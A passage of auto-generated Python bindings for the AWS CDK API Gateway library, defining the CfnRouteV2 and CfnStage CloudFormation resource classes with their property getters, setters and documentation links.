:param model_selection_expression: ``AWS::ApiGatewayV2::Route.ModelSelectionExpression``.
:param operation_name: ``AWS::ApiGatewayV2::Route.OperationName``.
:param request_models: ``AWS::ApiGatewayV2::Route.RequestModels``.
:param request_parameters: ``AWS::ApiGatewayV2::Route.RequestParameters``.
:param route_response_selection_expression: ``AWS::ApiGatewayV2::Route.RouteResponseSelectionExpression``.
:param target: ``AWS::ApiGatewayV2::Route.Target``.
"""
props = CfnRouteV2Props(api_id=api_id, route_key=route_key, api_key_required=api_key_required, authorization_scopes=authorization_scopes, authorization_type=authorization_type, authorizer_id=authorizer_id, model_selection_expression=model_selection_expression, operation_name=operation_name, request_models=request_models, request_parameters=request_parameters, route_response_selection_expression=route_response_selection_expression, target=target)
jsii.create(CfnRouteV2, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
"""Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
stability
:stability: experimental
"""
return jsii.invoke(self, "inspect", [inspector])
@jsii.member(jsii_name="renderProperties")
def _render_properties(self, props: typing.Mapping[str,typing.Any]) -> typing.Mapping[str,typing.Any]:
"""
:param props: -
"""
return jsii.invoke(self, "renderProperties", [props])
@classproperty
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> str:
"""The CloudFormation resource type name for this resource class."""
return jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME")
@property
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[str,typing.Any]:
return jsii.get(self, "cfnProperties")
@property
@jsii.member(jsii_name="apiId")
def api_id(self) -> str:
"""``AWS::ApiGatewayV2::Route.ApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-route.html#cfn-apigatewayv2-route-apiid
"""
return jsii.get(self, "apiId")
@api_id.setter
def api_id(self, value: str):
return jsii.set(self, "apiId", value)
@property
@jsii.member(jsii_name="requestModels")
def request_models(self) -> typing.Any:
"""``AWS::ApiGatewayV2::Route.RequestModels``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-route.html#cfn-apigatewayv2-route-requestmodels
"""
return jsii.get(self, "requestModels")
@request_models.setter
def request_models(self, value: typing.Any):
return jsii.set(self, "requestModels", value)
@property
@jsii.member(jsii_name="requestParameters")
def request_parameters(self) -> typing.Any:
"""``AWS::ApiGatewayV2::Route.RequestParameters``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-route.html#cfn-apigatewayv2-route-requestparameters
"""
return jsii.get(self, "requestParameters")
@request_parameters.setter
def request_parameters(self, value: typing.Any):
return jsii.set(self, "requestParameters", value)
@property
@jsii.member(jsii_name="routeKey")
def route_key(self) -> str:
"""``AWS::ApiGatewayV2::Route.RouteKey``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-route.html#cfn-apigatewayv2-route-routekey
"""
return jsii.get(self, "routeKey")
@route_key.setter
def route_key(self, value: str):
return jsii.set(self, "routeKey", value)
@property
@jsii.member(jsii_name="apiKeyRequired")
def api_key_required(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``AWS::ApiGatewayV2::Route.ApiKeyRequired``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-route.html#cfn-apigatewayv2-route-apikeyrequired
"""
return jsii.get(self, "apiKeyRequired")
@api_key_required.setter
def api_key_required(self, value: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]):
return jsii.set(self, "apiKeyRequired", value)
@property
@jsii.member(jsii_name="authorizationScopes")
def authorization_scopes(self) -> typing.Optional[typing.List[str]]:
"""``AWS::ApiGatewayV2::Route.AuthorizationScopes``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-route.html#cfn-apigatewayv2-route-authorizationscopes
"""
return jsii.get(self, "authorizationScopes")
@authorization_scopes.setter
def authorization_scopes(self, value: typing.Optional[typing.List[str]]):
return jsii.set(self, "authorizationScopes", value)
@property
@jsii.member(jsii_name="authorizationType")
def authorization_type(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Route.AuthorizationType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-route.html#cfn-apigatewayv2-route-authorizationtype
"""
return jsii.get(self, "authorizationType")
@authorization_type.setter
def authorization_type(self, value: typing.Optional[str]):
return jsii.set(self, "authorizationType", value)
@property
@jsii.member(jsii_name="authorizerId")
def authorizer_id(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Route.AuthorizerId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-route.html#cfn-apigatewayv2-route-authorizerid
"""
return jsii.get(self, "authorizerId")
@authorizer_id.setter
def authorizer_id(self, value: typing.Optional[str]):
return jsii.set(self, "authorizerId", value)
@property
@jsii.member(jsii_name="modelSelectionExpression")
def model_selection_expression(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Route.ModelSelectionExpression``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-route.html#cfn-apigatewayv2-route-modelselectionexpression
"""
return jsii.get(self, "modelSelectionExpression")
@model_selection_expression.setter
def model_selection_expression(self, value: typing.Optional[str]):
return jsii.set(self, "modelSelectionExpression", value)
@property
@jsii.member(jsii_name="operationName")
def operation_name(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Route.OperationName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-route.html#cfn-apigatewayv2-route-operationname
"""
return jsii.get(self, "operationName")
@operation_name.setter
def operation_name(self, value: typing.Optional[str]):
return jsii.set(self, "operationName", value)
@property
@jsii.member(jsii_name="routeResponseSelectionExpression")
def route_response_selection_expression(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Route.RouteResponseSelectionExpression``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-route.html#cfn-apigatewayv2-route-routeresponseselectionexpression
"""
return jsii.get(self, "routeResponseSelectionExpression")
@route_response_selection_expression.setter
def route_response_selection_expression(self, value: typing.Optional[str]):
return jsii.set(self, "routeResponseSelectionExpression", value)
@property
@jsii.member(jsii_name="target")
def target(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Route.Target``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-route.html#cfn-apigatewayv2-route-target
"""
return jsii.get(self, "target")
@target.setter
def target(self, value: typing.Optional[str]):
return jsii.set(self, "target", value)
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnRouteV2.ParameterConstraintsProperty", jsii_struct_bases=[], name_mapping={'required': 'required'})
class ParameterConstraintsProperty():
def __init__(self, *, required: typing.Union[bool, aws_cdk.core.IResolvable]):
"""
:param required: ``CfnRouteV2.ParameterConstraintsProperty.Required``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigatewayv2-route-parameterconstraints.html
"""
self._values = {
'required': required,
}
@property
def required(self) -> typing.Union[bool, aws_cdk.core.IResolvable]:
"""``CfnRouteV2.ParameterConstraintsProperty.Required``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigatewayv2-route-parameterconstraints.html#cfn-apigatewayv2-route-parameterconstraints-required
"""
return self._values.get('required')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'ParameterConstraintsProperty(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnRouteV2Props", jsii_struct_bases=[], name_mapping={'api_id': 'apiId', 'route_key': 'routeKey', 'api_key_required': 'apiKeyRequired', 'authorization_scopes': 'authorizationScopes', 'authorization_type': 'authorizationType', 'authorizer_id': 'authorizerId', 'model_selection_expression': 'modelSelectionExpression', 'operation_name': 'operationName', 'request_models': 'requestModels', 'request_parameters': 'requestParameters', 'route_response_selection_expression': 'routeResponseSelectionExpression', 'target': 'target'})
class CfnRouteV2Props():
def __init__(self, *, api_id: str, route_key: str, api_key_required: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None, authorization_scopes: typing.Optional[typing.List[str]]=None, authorization_type: typing.Optional[str]=None, authorizer_id: typing.Optional[str]=None, model_selection_expression: typing.Optional[str]=None, operation_name: typing.Optional[str]=None, request_models: typing.Any=None, request_parameters: typing.Any=None, route_response_selection_expression: typing.Optional[str]=None, target: typing.Optional[str]=None):
"""Properties for defining a ``AWS::ApiGatewayV2::Route``.
:param api_id: ``AWS::ApiGatewayV2::Route.ApiId``.
:param route_key: ``AWS::ApiGatewayV2::Route.RouteKey``.
:param api_key_required: ``AWS::ApiGatewayV2::Route.ApiKeyRequired``.
:param authorization_scopes: ``AWS::ApiGatewayV2::Route.AuthorizationScopes``.
:param authorization_type: ``AWS::ApiGatewayV2::Route.AuthorizationType``.
:param authorizer_id: ``AWS::ApiGatewayV2::Route.AuthorizerId``.
:param model_selection_expression: ``AWS::ApiGatewayV2::Route.ModelSelectionExpression``.
:param operation_name: ``AWS::ApiGatewayV2::Route.OperationName``.
:param request_models: ``AWS::ApiGatewayV2::Route.RequestModels``.
:param request_parameters: ``AWS::ApiGatewayV2::Route.RequestParameters``.
:param route_response_selection_expression: ``AWS::ApiGatewayV2::Route.RouteResponseSelectionExpression``.
:param target: ``AWS::ApiGatewayV2::Route.Target``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-route.html
"""
self._values = {
'api_id': api_id,
'route_key': route_key,
}
if api_key_required is not None: self._values["api_key_required"] = api_key_required
if authorization_scopes is not None: self._values["authorization_scopes"] = authorization_scopes
if authorization_type is not None: self._values["authorization_type"] = authorization_type
if authorizer_id is not None: self._values["authorizer_id"] = authorizer_id
if model_selection_expression is not None: self._values["model_selection_expression"] = model_selection_expression
if operation_name is not None: self._values["operation_name"] = operation_name
if request_models is not None: self._values["request_models"] = request_models
if request_parameters is not None: self._values["request_parameters"] = request_parameters
if route_response_selection_expression is not None: self._values["route_response_selection_expression"] = route_response_selection_expression
if target is not None: self._values["target"] = target
@property
def api_id(self) -> str:
"""``AWS::ApiGatewayV2::Route.ApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-route.html#cfn-apigatewayv2-route-apiid
"""
return self._values.get('api_id')
@property
def route_key(self) -> str:
"""``AWS::ApiGatewayV2::Route.RouteKey``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-route.html#cfn-apigatewayv2-route-routekey
"""
return self._values.get('route_key')
@property
def api_key_required(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``AWS::ApiGatewayV2::Route.ApiKeyRequired``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-route.html#cfn-apigatewayv2-route-apikeyrequired
"""
return self._values.get('api_key_required')
@property
def authorization_scopes(self) -> typing.Optional[typing.List[str]]:
"""``AWS::ApiGatewayV2::Route.AuthorizationScopes``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-route.html#cfn-apigatewayv2-route-authorizationscopes
"""
return self._values.get('authorization_scopes')
@property
def authorization_type(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Route.AuthorizationType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-route.html#cfn-apigatewayv2-route-authorizationtype
"""
return self._values.get('authorization_type')
@property
def authorizer_id(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Route.AuthorizerId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-route.html#cfn-apigatewayv2-route-authorizerid
"""
return self._values.get('authorizer_id')
@property
def model_selection_expression(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Route.ModelSelectionExpression``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-route.html#cfn-apigatewayv2-route-modelselectionexpression
"""
return self._values.get('model_selection_expression')
@property
def operation_name(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Route.OperationName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-route.html#cfn-apigatewayv2-route-operationname
"""
return self._values.get('operation_name')
@property
def request_models(self) -> typing.Any:
"""``AWS::ApiGatewayV2::Route.RequestModels``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-route.html#cfn-apigatewayv2-route-requestmodels
"""
return self._values.get('request_models')
@property
def request_parameters(self) -> typing.Any:
"""``AWS::ApiGatewayV2::Route.RequestParameters``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-route.html#cfn-apigatewayv2-route-requestparameters
"""
return self._values.get('request_parameters')
@property
def route_response_selection_expression(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Route.RouteResponseSelectionExpression``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-route.html#cfn-apigatewayv2-route-routeresponseselectionexpression
"""
return self._values.get('route_response_selection_expression')
@property
def target(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Route.Target``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-route.html#cfn-apigatewayv2-route-target
"""
return self._values.get('target')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'CfnRouteV2Props(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.implements(aws_cdk.core.IInspectable)
class CfnStage(aws_cdk.core.CfnResource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.CfnStage"):
"""A CloudFormation ``AWS::ApiGateway::Stage``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-stage.html
cloudformationResource:
:cloudformationResource:: AWS::ApiGateway::Stage
"""
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, rest_api_id: str, access_log_setting: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["AccessLogSettingProperty"]]]=None, cache_cluster_enabled: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None, cache_cluster_size: typing.Optional[str]=None, canary_setting: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["CanarySettingProperty"]]]=None, client_certificate_id: typing.Optional[str]=None, deployment_id: typing.Optional[str]=None, description: typing.Optional[str]=None, documentation_version: typing.Optional[str]=None, method_settings: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.List[typing.Union[aws_cdk.core.IResolvable, "MethodSettingProperty"]]]]]=None, stage_name: typing.Optional[str]=None, tags: typing.Optional[typing.List[aws_cdk.core.CfnTag]]=None, tracing_enabled: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None, variables: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]=None) -> None:
"""Create a new ``AWS::ApiGateway::Stage``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param props: - resource properties.
:param rest_api_id: ``AWS::ApiGateway::Stage.RestApiId``.
:param access_log_setting: ``AWS::ApiGateway::Stage.AccessLogSetting``.
:param cache_cluster_enabled: ``AWS::ApiGateway::Stage.CacheClusterEnabled``.
:param cache_cluster_size: ``AWS::ApiGateway::Stage.CacheClusterSize``.
:param canary_setting: ``AWS::ApiGateway::Stage.CanarySetting``.
:param client_certificate_id: ``AWS::ApiGateway::Stage.ClientCertificateId``.
:param deployment_id: ``AWS::ApiGateway::Stage.DeploymentId``.
:param description: ``AWS::ApiGateway::Stage.Description``.
:param documentation_version: ``AWS::ApiGateway::Stage.DocumentationVersion``.
:param method_settings: ``AWS::ApiGateway::Stage.MethodSettings``.
:param stage_name: ``AWS::ApiGateway::Stage.StageName``.
:param tags: ``AWS::ApiGateway::Stage.Tags``.
:param tracing_enabled: ``AWS::ApiGateway::Stage.TracingEnabled``.
:param variables: ``AWS::ApiGateway::Stage.Variables``.
"""
props = CfnStageProps(rest_api_id=rest_api_id, access_log_setting=access_log_setting, cache_cluster_enabled=cache_cluster_enabled, cache_cluster_size=cache_cluster_size, canary_setting=canary_setting, client_certificate_id=client_certificate_id, deployment_id=deployment_id, description=description, documentation_version=documentation_version, method_settings=method_settings, stage_name=stage_name, tags=tags, tracing_enabled=tracing_enabled, variables=variables)
jsii.create(CfnStage, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
"""Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
stability
:stability: experimental
"""
return jsii.invoke(self, "inspect", [inspector])
@jsii.member(jsii_name="renderProperties")
def _render_properties(self, props: typing.Mapping[str,typing.Any]) -> typing.Mapping[str,typing.Any]:
"""
:param props: -
"""
return jsii.invoke(self, "renderProperties", [props])
@classproperty
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> str:
"""The CloudFormation resource type name for this resource class."""
return jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME")
@property
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[str,typing.Any]:
return jsii.get(self, "cfnProperties")
@property
@jsii.member(jsii_name="tags")
def tags(self) -> aws_cdk.core.TagManager:
"""``AWS::ApiGateway::Stage.Tags``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-stage.html#cfn-apigateway-stage-tags
"""
return jsii.get(self, "tags")
@property
@jsii.member(jsii_name="restApiId")
def rest_api_id(self) -> str:
"""``AWS::ApiGateway::Stage.RestApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-stage.html#cfn-apigateway-stage-restapiid
"""
return jsii.get(self, "restApiId")
@rest_api_id.setter
def rest_api_id(self, value: str):
return jsii.set(self, "restApiId", value)
@property
@jsii.member(jsii_name="accessLogSetting")
def access_log_setting(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["AccessLogSettingProperty"]]]:
"""``AWS::ApiGateway::Stage.AccessLogSetting``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-stage.html#cfn-apigateway-stage-accesslogsetting
"""
return jsii.get(self, "accessLogSetting")
@access_log_setting.setter
def access_log_setting(self, value: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["AccessLogSettingProperty"]]]):
return jsii.set(self, "accessLogSetting", value)
@property
@jsii.member(jsii_name="cacheClusterEnabled")
def cache_cluster_enabled(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``AWS::ApiGateway::Stage.CacheClusterEnabled``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-stage.html#cfn-apigateway-stage-cacheclusterenabled
"""
return jsii.get(self, "cacheClusterEnabled")
@cache_cluster_enabled.setter
def cache_cluster_enabled(self, value: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]):
return jsii.set(self, "cacheClusterEnabled", value)
@property
@jsii.member(jsii_name="cacheClusterSize")
def cache_cluster_size(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Stage.CacheClusterSize``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-stage.html#cfn-apigateway-stage-cacheclustersize
"""
return jsii.get(self, "cacheClusterSize")
@cache_cluster_size.setter
def cache_cluster_size(self, value: typing.Optional[str]):
return jsii.set(self, "cacheClusterSize", value)
@property
@jsii.member(jsii_name="canarySetting")
def canary_setting(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["CanarySettingProperty"]]]:
"""``AWS::ApiGateway::Stage.CanarySetting``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-stage.html#cfn-apigateway-stage-canarysetting
"""
return jsii.get(self, "canarySetting")
@canary_setting.setter
def canary_setting(self, value: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["CanarySettingProperty"]]]):
return jsii.set(self, "canarySetting", value)
@property
@jsii.member(jsii_name="clientCertificateId")
def client_certificate_id(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Stage.ClientCertificateId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-stage.html#cfn-apigateway-stage-clientcertificateid
"""
return jsii.get(self, "clientCertificateId")
@client_certificate_id.setter
def client_certificate_id(self, value: typing.Optional[str]):
return jsii.set(self, "clientCertificateId", value)
@property
@jsii.member(jsii_name="deploymentId")
def deployment_id(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Stage.DeploymentId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-stage.html#cfn-apigateway-stage-deploymentid
"""
return jsii.get(self, "deploymentId")
@deployment_id.setter
def deployment_id(self, value: typing.Optional[str]):
return jsii.set(self, "deploymentId", value)
@property
@jsii.member(jsii_name="description")
def description(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Stage.Description``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-stage.html#cfn-apigateway-stage-description
"""
return jsii.get(self, "description")
@description.setter
def description(self, value: typing.Optional[str]):
return jsii.set(self, "description", value)
@property
@jsii.member(jsii_name="documentationVersion")
def documentation_version(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Stage.DocumentationVersion``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-stage.html#cfn-apigateway-stage-documentationversion
"""
return jsii.get(self, "documentationVersion")
@documentation_version.setter
def documentation_version(self, value: typing.Optional[str]):
return jsii.set(self, "documentationVersion", value)
@property
@jsii.member(jsii_name="methodSettings")
def method_settings(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.List[typing.Union[aws_cdk.core.IResolvable, "MethodSettingProperty"]]]]]:
"""``AWS::ApiGateway::Stage.MethodSettings``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-stage.html#cfn-apigateway-stage-methodsettings
"""
return jsii.get(self, "methodSettings")
@method_settings.setter
def method_settings(self, value: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.List[typing.Union[aws_cdk.core.IResolvable, "MethodSettingProperty"]]]]]):
return jsii.set(self, "methodSettings", value)
@property
@jsii.member(jsii_name="stageName")
def stage_name(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Stage.StageName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-stage.html#cfn-apigateway-stage-stagename
"""
return jsii.get(self, "stageName")
@stage_name.setter
def stage_name(self, value: typing.Optional[str]):
return jsii.set(self, "stageName", value)
@property
@jsii.member(jsii_name="tracingEnabled")
def tracing_enabled(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``AWS::ApiGateway::Stage.TracingEnabled``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-stage.html#cfn-apigateway-stage-tracingenabled
"""
return jsii.get(self, "tracingEnabled")
@tracing_enabled.setter
def tracing_enabled(self, value: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]):
return jsii.set(self, "tracingEnabled", value)
@property
@jsii.member(jsii_name="variables")
def variables(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]:
"""``AWS::ApiGateway::Stage.Variables``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-stage.html#cfn-apigateway-stage-variables
"""
return jsii.get(self, "variables")
@variables.setter
def variables(self, value: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]):
return jsii.set(self, "variables", value)
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnStage.AccessLogSettingProperty", jsii_struct_bases=[], name_mapping={'destination_arn': 'destinationArn', 'format': 'format'})
class AccessLogSettingProperty():
def __init__(self, *, destination_arn: typing.Optional[str]=None, format: typing.Optional[str]=None):
"""
:param destination_arn: ``CfnStage.AccessLogSettingProperty.DestinationArn``.
:param format: ``CfnStage.AccessLogSettingProperty.Format``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-stage-accesslogsetting.html
"""
self._values = {
}
if destination_arn is not None: self._values["destination_arn"] = destination_arn
if format is not None: self._values["format"] = format
@property
def destination_arn(self) -> typing.Optional[str]:
"""``CfnStage.AccessLogSettingProperty.DestinationArn``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-stage-accesslogsetting.html#cfn-apigateway-stage-accesslogsetting-destinationarn
"""
return self._values.get('destination_arn')
@property
def format(self) -> typing.Optional[str]:
"""``CfnStage.AccessLogSettingProperty.Format``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-stage-accesslogsetting.html#cfn-apigateway-stage-accesslogsetting-format
"""
return self._values.get('format')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'AccessLogSettingProperty(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnStage.CanarySettingProperty", jsii_struct_bases=[], name_mapping={'deployment_id': 'deploymentId', 'percent_traffic': 'percentTraffic', 'stage_variable_overrides': 'stageVariableOverrides', 'use_stage_cache': 'useStageCache'})
class CanarySettingProperty():
def __init__(self, *, deployment_id: typing.Optional[str]=None, percent_traffic: typing.Optional[jsii.Number]=None, stage_variable_overrides: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]=None, use_stage_cache: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None):
"""
:param deployment_id: ``CfnStage.CanarySettingProperty.DeploymentId``.
:param percent_traffic: ``CfnStage.CanarySettingProperty.PercentTraffic``.
:param stage_variable_overrides: ``CfnStage.CanarySettingProperty.StageVariableOverrides``.
:param use_stage_cache: ``CfnStage.CanarySettingProperty.UseStageCache``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-stage-canarysetting.html
"""
self._values = {
}
if deployment_id is not None: self._values["deployment_id"] = deployment_id
if percent_traffic is not None: self._values["percent_traffic"] = percent_traffic
if stage_variable_overrides is not None: self._values["stage_variable_overrides"] = stage_variable_overrides
if use_stage_cache is not None: self._values["use_stage_cache"] = use_stage_cache
@property
def deployment_id(self) -> typing.Optional[str]:
"""``CfnStage.CanarySettingProperty.DeploymentId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-stage-canarysetting.html#cfn-apigateway-stage-canarysetting-deploymentid
"""
return self._values.get('deployment_id')
@property
def percent_traffic(self) -> typing.Optional[jsii.Number]:
"""``CfnStage.CanarySettingProperty.PercentTraffic``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-stage-canarysetting.html#cfn-apigateway-stage-canarysetting-percenttraffic
"""
return self._values.get('percent_traffic')
@property
def stage_variable_overrides(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]:
"""``CfnStage.CanarySettingProperty.StageVariableOverrides``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-stage-canarysetting.html#cfn-apigateway-stage-canarysetting-stagevariableoverrides
"""
return self._values.get('stage_variable_overrides')
@property
def use_stage_cache(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
